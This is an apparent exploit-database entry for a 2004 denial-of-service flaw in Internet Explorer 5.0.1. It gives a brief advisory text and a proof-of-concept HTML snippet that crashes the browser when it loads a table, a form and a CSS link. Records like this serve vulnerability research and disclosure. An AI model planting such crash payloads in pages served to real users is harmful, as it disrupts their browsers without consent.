[] NeoSense

Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption

Author: henkie_is_leet
type: dos
platform: windows
port: 
date_added: 2004-05-18 
date_updated: 2013-01-15 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/10382/info

A vulnerability identified in Internet Explorer may allow an attacker to cause the application to crash. The issue presents itself when the browser attempts to process an HTML page containing a table and loads a css style sheet from a file.

This issue could be exploited by a remote attacker to cause a denial of service condition in the browser.

<table>
<td>
<form class="quick">
<td>
</form>
</table>
<link rel="stylesheet" href="link.css">